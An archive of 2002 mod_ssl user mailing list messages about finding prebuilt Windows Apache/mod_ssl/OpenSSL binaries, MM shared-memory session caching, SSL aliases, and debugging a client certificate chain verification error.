If your query  relates to mbs1111 or it support please contact Jeff1

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 23:20:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA23866; Wed, 18 Sep 2002 23:19:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id XAA23849; Wed, 18 Sep 2002 23:19:07 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 18 Sep 2002 14:18:57 -0700
Received: from 204.115.33.49 by lw7fd.law7.hotmail.msn.com with HTTP;
	Wed, 18 Sep 2002 21:18:57 GMT
X-Originating-IP: [204.115.33.49]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
Date: Wed, 18 Sep 2002 21:18:57 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 18 Sep 2002 21:18:57.0460 (UTC) FILETIME=[FFE2A740:01C25F58]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Thanks a lot chris. I am sure that a lot of us would be benefitted by this.

I am trying to find a way if this file can be posted on the mod_ssl user's 
contribution area, http://www.modssl.org/contrib/ftp/contrib/

I have posed this question to our friends in the mod_ssl user community and 
i am hoping to hear shortly from them.

Bye,
-Jim.


--------------------------------------------------------------------
Jim and/or Paul,

I don't know how to contribute... I will find out, but it is late
and I want to go to bed.  Maybe someone can put these into
http://www.modssl.org/contrib/ftp/contrib/ for me.  And, someone
could shorten the path to the knowledge of how to submit the code
for contribution -- I tried ftp'ing and could not write (no
suprise).

I have binaries (untested) for the releases you are after.
(I am running Apache 2.0.40 but can easily build the code for these
versions - configuring and testing it is more work and I leave that
up to you).

If you have any problem with the code I will spend some more time on
it later in the evening - send me a note (theantigod@sympatico.ca or
hunter@tor.ath.cx).

http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip

I built the openssl with masm as well by the way.

chris

P.S.
I cannot handle a lot of traffic and suffer from (relatively) slow
transfer rate. (ADSL Modem with Sympatico)



>From: hunter Reply-To: modssl-users@modssl.org
>To: modssl-users@modssl.org
>Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>Date: Wed, 18 Sep 2002 05:51:56 -0400
>
>Jim Lee wrote:
>>Hi,
>>
>>Since i am a windows user, i am looking for an already compiled file:
>>Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>
>>Since i do not have any compilers installed, i would really appreciate if 
>>any of our UNIX friends could help our WINDOWS collegues and post the 
>>Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip file in the 
>>following location: http://www.modssl.org/contrib/ftp/contrib/
>>
>>Thanks,
>>
>>Bye,
>>-Jim.
>>
>>>From: Horst To: Jim Lee 
>>>Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>>Date: Tue, 17 Sep 2002 20:42:08 -0700 (PDT)
>>>
>>>Hi Jim,
>>>I didn't read all the previous messages and the reference to
>>>http://www.modssl.org/contrib/ftp/contrib/
>>>  but I'd guess you can google for the 3 independent files.
>>>That's how I found Apache_1.3.26 and Mod_SSL_2.8.10 recently.
>>>
>>>  - Horst (ohh, just realizing you are on Win - I am on linux and got the
>>>RPMs with no problem)
>>>
>>>
>>>On Wed, 18 Sep 2002, Jim Lee wrote:
>>>
>>> > I have been unable to find the file:
>>> >
>>> > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>> >
>>> > at the following location:
>>> >
>>> > http://www.modssl.org/contrib/ftp/contrib/
>>> >
>>> > Any help from our fellow members in the group would be higly 
>>>appreciated in
>>> > view of the recent openSSL worm virus alerts.
>>> >
>>> > Thanks and Regards,
>>> >
>>> > Bye,
>>> > -Jim.
>>> >
>>> >
>>> > >From: Paul
>>
>>To: jimlee2@hotmail.com
>>
>>> > >Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>> > >Date: Wed, 18 Sep 2002 09:02:41 +1200
>>> > >
>>> > > > Hi,
>>> > > >
>>> > > > I am looking for the following file:
>>> > > >
>>> > > >
>>> > > > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>> > > >
>>> > > >
>>> > > > in the     http://www.modssl.org/contrib/ftp/contrib/       
>>>folder.
>>> > > >
>>> > > >
>>> > > > If anyone could contribute this file, i would highly appreciate 
>>>it.
>>> > > >
>>> > >
>>> > >Hi Jim,
>>> > >
>>> > >I'm looking for that file too!  Did you have any luck.
>>> > >
>>> > >Cheers, Paul.
>>> > >--
>>> >
>>> >
>>> >
>>> >
>>> > _________________________________________________________________
>>
>>
>>
>>
>>
>>
>>_________________________________________________________________
>>MSN Photos is the easiest way to share and print your photos: 
>>http://photos.msn.com/support/worldwide.aspx
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>Jim and/or Paul,
>
>I don't know how to contribute... I will find out, but it is late and I 
>want to go to bed.  Maybe someone can put these into 
>http://www.modssl.org/contrib/ftp/contrib/ for me.  And, someone could 
>shorten the path to the knowledge of how to submit the code for 
>contribution -- I tried ftp'ing and could not write (no suprise).
>
>I have binaries (untested) for the releases you are after.
>(I am running Apache 2.0.40 but can easily build the code for these 
>versions - configuring and testing it is more work and I leave that up to 
>you).
>
>If you have any problem with the code I will spend some more time on it 
>later in the evening - send me a note (theantigod@sympatico.ca or 
>hunter@tor.ath.cx).
>
>http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip
>
>I built the openssl with masm as well by the way.
>
>chris
>
>P.S.
>I cannot handle a lot of traffic and suffer from (relatively) slow transfer 
>rate. (ADSL Modem with Sympatico)
>
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org




_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 19 01:39:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA26699; Thu, 19 Sep 2002 01:38:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from renown.cnchost.com id BAA26694; Thu, 19 Sep 2002 01:37:44 +0200 (MET DST)
Received: from LAP012 (host-30.whitepj.net [63.145.241.30] (may be forged))
	by renown.cnchost.com
	id TAA21700; Wed, 18 Sep 2002 19:37:34 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Gilles Gros" 
To: 
Subject: Question regarding MM
Date: Wed, 18 Sep 2002 16:37:31 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Gros" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I have a simple question, but I am still unable to find the answer in the
docs.

What are the use and benefit of using MM with mod_ssl?

Thank you for your insight.

Gilles

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 19 02:07:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA27306; Thu, 19 Sep 2002 02:06:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from irvexch1.rainbow.com id CAA27167; Thu, 19 Sep 2002 02:05:37 +0200 (MET DST)
Received: by IRVEXCH1 with Internet Mail Service (5.5.2653.19)
	id ; Wed, 18 Sep 2002 16:39:36 -0700
Message-ID: <5606C687D4C7D5119A5800508BF30DB401C0487E@IRVEXCH1>
From: Lynn Gazis 
To: "'modssl-users@modssl.org'" 
Subject: RE: Question regarding MM
Date: Wed, 18 Sep 2002 16:39:33 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lynn Gazis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It lets you use shared memory session caching; the session cache which gets
the best performance is a shared memory cache, the shmcb cache.

Lynn Gazis

-----Original Message-----
From: Gilles Gros [mailto:gillesg@whitepj.com]
Sent: Wednesday, September 18, 2002 4:38 PM
To: modssl-users@modssl.org
Subject: Question regarding MM


Hi,

I have a simple question, but I am still unable to find the answer in the
docs.

What are the use and benefit of using MM with mod_ssl?

Thank you for your insight.

Gilles

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 19 10:22:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA07429; Thu, 19 Sep 2002 10:21:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id KAA07394; Thu, 19 Sep 2002 10:20:43 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g8J8K1P21433
	for ; Thu, 19 Sep 2002 09:20:27 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Thu, 19 Sep 2002 09:19:58 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F20BD@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Using Aliases and SSL
Date: Thu, 19 Sep 2002 09:19:52 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C25FB5.543194D0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C25FB5.543194D0
Content-Type: text/plain;
	charset="iso-8859-1"

Do I take it that you mean "ServerAlias"? If you do, then provided the alias
name matches the same IP address that your secure host is listening to, it
should work. I use it here myself.
 
If on the other hand you mean the Alias command that aliases directories, I
know of no reason why this shouldn't work. Can you post an example please?
 
- 
John Airey, BSc (Jt Hons), CNA, RHCE 
Internet systems support officer, ITCSD, Royal National Institute of the
Blind, 
Bakewell Road, Peterborough PE2 6XU, 
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Reality TV - the ultimate oxymoron 

-----Original Message-----
From: Matias Silva [mailto:mpsilva@storagecommander.com]
Sent: 18 September 2002 20:39
To: User Group mod_ssl
Subject: Using Aliases and SSL


Can anybody assist me, in using Aliases with ssl?.  
 
I placed several Alias directives within the ssl.conf file specifically
where the virtual host is defined.  
This was to help assist in organizing the Apache server.  Of course its not
working.
 
Where should I place Alias Directives that need to be included in the ssl
area of the server ?
or Does SSL even work with Aliases?
 
Cheers
-Matt


- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

------_=_NextPart_001_01C25FB5.543194D0
Content-Type: text/html;
	charset="iso-8859-1"











Do I 
take it that you mean "ServerAlias"? If you do, then provided the alias name 
matches the same IP address that your secure host is listening to, it should 
work. I use it here myself.


 


If on 
the other hand you mean the Alias command that aliases directories, I know 
of no reason why this shouldn't work. Can you post an example 
please?


 




- 
John Airey, 
BSc (Jt Hons), CNA, RHCE 
Internet systems 
support officer, ITCSD, Royal National Institute of the Blind, 
Bakewell Road, Peterborough PE2 6XU, 
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 
John.Airey@rnib.org.uk 


Reality TV - the ultimate oxymoron 




  
-----Original Message-----
From: Matias Silva 
  [mailto:mpsilva@storagecommander.com]
Sent: 18 September 2002 
  20:39
To: User Group mod_ssl
Subject: Using Aliases and 
  SSL


  
Can anybody assist me, in using Aliases with 
  ssl?.  

  
 

  
I placed several Alias directives within 
  the ssl.conf file specifically where the 
  virtual host is defined.  

  
This was to help assist in organizing the 
  Apache server.  Of course its not working.

  
 

  
Where should I place Alias Directives that 
  need to be included in the ssl area of the server ?

  
or Does SSL even work with Aliases?

  
 

  
Cheers

  
-Matt





- 





NOTICE: The information contained in this email and any attachments is 



confidential and may be legally privileged. If you are not the 



intended recipient you are hereby notified that you must not use, 



disclose, distribute, copy, print or rely on this email's content. If 



you are not the intended recipient, please notify the sender 



immediately and then delete the email and any attachments from your 



system.





RNIB has made strenuous efforts to ensure that emails and any 



attachments generated by its staff are free from viruses. However, it 



cannot accept any responsibility for any viruses which are 



transmitted. We therefore recommend you scan all attachments.





Please note that the statements and views expressed in this email 



and any attachments are those of the author and do not necessarily 



represent those of RNIB.





RNIB Registered Charity Number: 226227





Website: http://www.rnib.org.uk 


------_=_NextPart_001_01C25FB5.543194D0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 19 19:55:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA23180; Thu, 19 Sep 2002 19:54:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from unimur.um.es id TAA23171; Thu, 19 Sep 2002 19:53:57 +0200 (MET DST)
Received: from aries.dif.um.es (aries.dif.um.es [155.54.210.253])
	by unimur.um.es (8.9.1b+Sun/8.9.1) with ESMTP id SAA03746
	for ; Thu, 19 Sep 2002 18:33:31 +0200 (MEST)
Received: from dif.um.es (pirania.dif.um.es [155.54.210.33])
	by aries.dif.um.es (Postfix) with ESMTP id DD03114431
	for ; Thu, 19 Sep 2002 18:28:18 +0200 (MET DST)
Message-ID: <3D89FBAD.6070607@dif.um.es>
Date: Thu, 19 Sep 2002 18:30:37 +0200
From: =?ISO-8859-1?Q?Gabriel_L=F3pez_Mill=E1n?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: verify client certificate II
References: <3D89F2D5.8060704@dif.um.es> <3D89FB7F.9030003@dif.um.es>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms030202060006040302080207"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Gabriel_L=F3pez_Mill=E1n?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms030202060006040302080207
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

  Hi again.

   I have verify these certificates from openssl command line:

   openssl verify openssl verify -CAfile PKIv6_3.2_ca_sub2.p7c.pem 
imladris.dif.um.esCert.pem

   where:
       PKIv6_3.2_ca_sub2.p7c.pem is a PEM certificates chain with "Root 
CA Certificate" and "Subordinate CA Certificate"
       imladris.dif.um.esCert.pem is the server certificate

   and the result is

   imladris.dif.um.esCert.pem: OK

   It's verified ¡¡¡

   It seem to be a problem of  modssl module 2.8.3.

   Can anybody help me?

   Thanks, Gabi.

Gabriel López Millán wrote:

>
>    Hi again.
>
>    I have verify these certificates from openssl command line:
>
>    openssl verify openssl verify -CAfile PKIv6_3.2_ca_sub2.p7c.pem 
> imladris.dif.um.esCert.pem
>
>    where:
>        PKIv6_3.2_ca_sub2.p7c.pem is a PEM certificates chain with 
> "Root CA Certificate" and "Subordinate CA Certificate"
>        imladris.dif.um.esCert.pem is the server certificate
>
>    and the result is
>
>    imladris.dif.um.esCert.pem: OK
>
>    It's verified ¡¡¡
>
>    It seem to be a problem of  modssl module 2.8.3.
>
>    Can anybody help me?
>
>    Thanks, Gabi.
>  
>
> Gabriel López Millán wrote:
>
>>  Hi all.
>>
>>   I have a problem with a certificate chain and a server certificate, 
>> I need help.
>>   The certificate chain is formed by the Root CA Certificate and the 
>> Subordinate CA Certificate below showed.
>>   The server certificate is the last certificate.
>>     I have configured apache with modssl and when i try to access to 
>> https://imladris.dif.um.es I get the following error:
>>
>> Apache/1.3.19 (Unix) ApacheJServ/1.1.2 mod_ssl/2.8.3 OpenSSL/0.9.6g 
>> configured -- resuming normal operations
>> [Thu Sep 19 10:13:14 2002] [error] mod_ssl: SSL handshake failed 
>> (server imladris.dif.um.es:443, client 2001:720:1710:f00::2) (OpenSSL 
>> library error follows)
>> [Thu Sep 19 10:13:14 2002] [error] OpenSSL: error:14094412:SSL 
>> routines:SSL3_READ_BYTES:sslv3 alert bad certificate [Hint: Subject 
>> CN in certificate not server name or identical to CA!?]
>>
>>   Obviously it's a mistake, server certificate's subject is the same 
>> than the server name (in httpd.conf file)
>>   and it's not a CA.
>>
>>   I think the problem is in the path validation, in the 
>> NameConstraints extensions (2.5.29.30), but I'm not sure.
>>   I don't know if openssl supports this extensins and if it's well 
>> configured.
>>
>>   Any idea?
>>
>>   Thanks, Gabi.
>>
>>
>> ** Root CA Certificate **
>>
>> Certificate:
>>   Data:
>>       Version: 3 (0x2)
>>       Serial Number: 1 (0x1)
>>       Signature Algorithm: md5WithRSAEncryption
>>       Issuer: C=ES, O=umu, OU=umu, CN=PKIv6 3.2 ca root
>>       Validity
>>           Not Before: Sep 16 22:00:00 2002 GMT
>>           Not After : Sep 16 22:00:00 2004 GMT
>>       Subject: C=ES, O=umu, OU=umu, CN=PKIv6 3.2 ca root
>>       Subject Public Key Info:
>>           Public Key Algorithm: rsaEncryption
>>           RSA Public Key: (1024 bit)
>>               Modulus (1024 bit):
>>                   00:aa:e5:b5:5b:0a:f4:ef:79:2a:4d:8e:84:e1:ce:
>>                   43:59:81:2d:b6:53:8c:97:77:4f:db:07:08:69:b0:
>>                   68:ea:1d:cd:fe:c2:a4:a2:08:ec:ce:ed:b4:13:91:
>>                   dc:da:bf:27:41:ef:f1:f3:3b:96:36:97:2f:9c:f3:
>>                   48:21:b3:a0:34:0d:8a:e8:04:cf:d5:c2:06:dd:cf:
>>                   5d:ea:7c:d5:9e:ab:92:65:7a:e1:32:ee:73:f4:4f:
>>                   99:be:18:5c:a0:84:5c:b0:09:f0:8a:68:61:1a:94:
>>                   ec:c5:95:9b:10:c4:0b:4b:e9:e0:2f:48:7b:2b:23:
>>                   56:02:56:a7:2c:16:c4:2f:0d
>>               Exponent: 65537 (0x10001)
>>       X509v3 extensions:
>>           X509v3 Key Usage: critical
>>               Digital Signature, Certificate Sign, CRL Sign
>>           X509v3 Basic Constraints: critical
>>               CA:TRUE
>>           Netscape Cert Type:
>>               SSL Client, S/MIME, SSL CA, S/MIME CA, Object Signing CA
>>   Signature Algorithm: md5WithRSAEncryption
>>
>>
>> *** Subordinate CA Certificate ***
>>
>> Certificate:
>>   Data:
>>       Version: 3 (0x2)
>>       Serial Number: 28 (0x1c)
>>       Signature Algorithm: md5WithRSAEncryption
>>       Issuer: C=ES, O=umu, OU=umu, CN=PKIv6 3.2 ca root
>>       Validity
>>           Not Before: Sep 17 11:25:36 2002 GMT
>>           Not After : Sep 17 11:25:36 2003 GMT
>>       Subject: C=ES, O=umu, OU=umu dd, CN=PKIv6 3.2 ca sub2
>>       Subject Public Key Info:
>>           Public Key Algorithm: rsaEncryption
>>           RSA Public Key: (512 bit)
>>               Modulus (512 bit):
>>                   00:b5:e5:36:3f:7a:29:a0:da:3a:67:60:4f:ed:52:
>>                   81:09:26:21:4d:a7:14:77:54:56:be:87:1d:5a:62:
>>                   26:89:aa:f4:00:19:e6:c5:d8:c0:68:71:0f:2b:b5:
>>                   7b:54:25:7f:98:2e:75:e6:65:76:b4:9f:39:99:2e:
>>                   56:19:b6:5e:27
>>               Exponent: 65537 (0x10001)
>>       X509v3 extensions:
>>           X509v3 Key Usage: critical
>>               Certificate Sign, CRL Sign
>>           2.5.29.30: critical
>>               0...0...umu-euro6ix dd
>>           X509v3 Basic Constraints: critical
>>               CA:TRUE
>>           Netscape Cert Type:
>>               SSL Client, S/MIME, SSL CA, S/MIME CA, Object Signing CA
>>   Signature Algorithm: md5WithRSAEncryption
>>
>> *** Server Certificate (ServerName=imladris.dif.um.es) **
>>
>>   Certificate:
>>   Data:
>>       Version: 3 (0x2)
>>       Serial Number: 15 (0xf)
>>       Signature Algorithm: md5WithRSAEncryption
>>       Issuer: C=ES, O=umu, OU=umu dd, CN=PKIv6 3.2 ca sub2
>>       Validity
>>           Not Before: Sep 17 15:55:07 2002 GMT
>>           Not After : Sep 17 15:55:07 2003 GMT
>>       Subject: C=ES, O=umu, OU=umu dd, CN=imladris.dif.um.es
>>       Subject Public Key Info:
>>           Public Key Algorithm: rsaEncryption
>>           RSA Public Key: (512 bit)
>>               Modulus (512 bit):
>>                   00:b6:85:42:e5:32:6f:30:5f:69:8f:c1:93:ca:a6:
>>                   19:3a:67:b7:c0:d2:12:e0:7d:c2:75:0f:4e:00:30:
>>                   16:4f:39:fb:9a:49:5d:db:18:bb:20:b4:6b:67:df:
>>                   ca:96:2f:18:1e:95:b9:56:9b:19:72:9a:2a:78:b7:
>>                   09:d9:0f:15:37
>>               Exponent: 65537 (0x10001)
>>       X509v3 extensions:
>>           Netscape Cert Type:
>>               SSL Server, S/MIME, Object Signing
>>           X509v3 Basic Constraints:
>>               CA:FALSE
>>           X509v3 Subject Alternative Name:
>>               email:gabilm@dif.um.es
>>   Signature Algorithm: md5WithRSAEncryption
>>
>
>


-- 
-------------------------------------------------
Gabriel Lopez Millan - Grupo ANTS-CIRCuS
Facultad de Informática
Universidad de Murcia (España) Tfo: +34 968367645



--------------ms030202060006040302080207
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIFqjCC
AtEwggI6oAMCAQICAU4wDQYJKoZIhvcNAQEEBQAwNjELMAkGA1UEBhMCRVMxDDAKBgNVBAoT
A1VNVTEZMBcGA1UEAxMQRXVybzZpeCBQS0kgSSBDQTAeFw0wMjA5MDIxMDA3NTlaFw0wMzA5
MDIxMDA3NTlaMEsxCzAJBgNVBAYTAkVTMQwwCgYDVQQKEwNVTVUxDzANBgNVBAsTBkNJUkN1
UzEdMBsGA1UEAxMUR2FicmllbCBMb3BleiBNaWxsYW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0A
MIGJAoGBAKXTRt9kXetQDFpsekd2r7W7Lpe46QauguBWX/VaHCgstNXliWxzgjgD63ZHBZnQ
nh8FPO+N/lRp11WbT1ATn7k8zbtUix14eyPTT6CN/srVl1NWsNZAP40+dAlYs/owGB2hQETH
KYO0ySapvzjijtFItEWKbbMsZMI4mxES4i/5AgMBAAGjgdkwgdYwSAYDVR0gBEEwPzA9BgUr
BgcICTA0MDIGCCsGAQUFBwIBFiZodHRwczovLzE1NS41NC45NS42Ni9waXNjaXMvY3BzcG9p
bnRlcjAwBggrBgEFBQcBAQQkMCIwIAYIKwYBBQUHMAKGFGh0dHBzOi8vMTU1LjU0Ljk1LjY2
MBEGCWCGSAGG+EIBAQQEAwIFoDAJBgNVHRMEAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggr
BgEFBQcDBDAbBgNVHREEFDASgRBnYWJpbG1AZGlmLnVtLmVzMA0GCSqGSIb3DQEBBAUAA4GB
AK5k8njocBtGpwDWQMjV11x4wZYuDlBnN+xagUU+21JKNlktBQnCh23YL4Fn+ida/C8SXMP/
DfLG+FgaCoq4G4md5LKkO++xFIiUZ4Ei5/B5ZEa3l0iljG4TpbE77Ta4wWH4Zu9vexudi5yw
6QPJdSR1CwyATtdFyvWc5mHaeGhqMIIC0TCCAjqgAwIBAgIBTjANBgkqhkiG9w0BAQQFADA2
MQswCQYDVQQGEwJFUzEMMAoGA1UEChMDVU1VMRkwFwYDVQQDExBFdXJvNml4IFBLSSBJIENB
MB4XDTAyMDkwMjEwMDc1OVoXDTAzMDkwMjEwMDc1OVowSzELMAkGA1UEBhMCRVMxDDAKBgNV
BAoTA1VNVTEPMA0GA1UECxMGQ0lSQ3VTMR0wGwYDVQQDExRHYWJyaWVsIExvcGV6IE1pbGxh
bjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApdNG32Rd61AMWmx6R3avtbsul7jpBq6C
4FZf9VocKCy01eWJbHOCOAPrdkcFmdCeHwU8743+VGnXVZtPUBOfuTzNu1SLHXh7I9NPoI3+
ytWXU1aw1kA/jT50CViz+jAYHaFARMcpg7TJJqm/OOKO0Ui0RYptsyxkwjibERLiL/kCAwEA
AaOB2TCB1jBIBgNVHSAEQTA/MD0GBSsGBwgJMDQwMgYIKwYBBQUHAgEWJmh0dHBzOi8vMTU1
LjU0Ljk1LjY2L3Bpc2Npcy9jcHNwb2ludGVyMDAGCCsGAQUFBwEBBCQwIjAgBggrBgEFBQcw
AoYUaHR0cHM6Ly8xNTUuNTQuOTUuNjYwEQYJYIZIAYb4QgEBBAQDAgWgMAkGA1UdEwQCMAAw
HQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMEMBsGA1UdEQQUMBKBEGdhYmlsbUBkaWYu
dW0uZXMwDQYJKoZIhvcNAQEEBQADgYEArmTyeOhwG0anANZAyNXXXHjBli4OUGc37FqBRT7b
Uko2WS0FCcKHbdgvgWf6J1r8LxJcw/8N8sb4WBoKirgbiZ3ksqQ777EUiJRngSLn8HlkRreX
SKWMbhOlsTvtNrjBYfhm7297G52LnLDpA8l1JHULDIBO10XK9ZzmYdp4aGoxggHjMIIB3wIB
ATA7MDYxCzAJBgNVBAYTAkVTMQwwCgYDVQQKEwNVTVUxGTAXBgNVBAMTEEV1cm82aXggUEtJ
IEkgQ0ECAU4wCQYFKw4DAhoFAKCB/zAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqG
SIb3DQEJBTEPFw0wMjA5MTkxNjMwMzdaMCMGCSqGSIb3DQEJBDEWBBSdVIyzACUY3fFVMfff
mQaTERcnmDBMBgsqhkiG9w0BCRACCzE9oDswNjELMAkGA1UEBhMCRVMxDDAKBgNVBAoTA1VN
VTEZMBcGA1UEAxMQRXVybzZpeCBQS0kgSSBDQQIBTjBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqG
SIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzANBggqhkiG
9w0DAgIBKDANBgkqhkiG9w0BAQEFAASBgEZKuJ8pOcjFS+460HrEeX9KJc5eGxYC/k8A4Y+o
ABi0jCQK8+dKzGnFWHGyDKcKJGtTplhfXyuMKdPJhVtmrSRM7gPLAR1wPclmsXVmCiESvHBG
XS9afJU3xY5UDnGRRpcr8JxSHz5B6A3vbdive1M/B5KTQzqHksW0S4ihTZgFAAAAAAAA
--------------ms030202060006040302080207--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

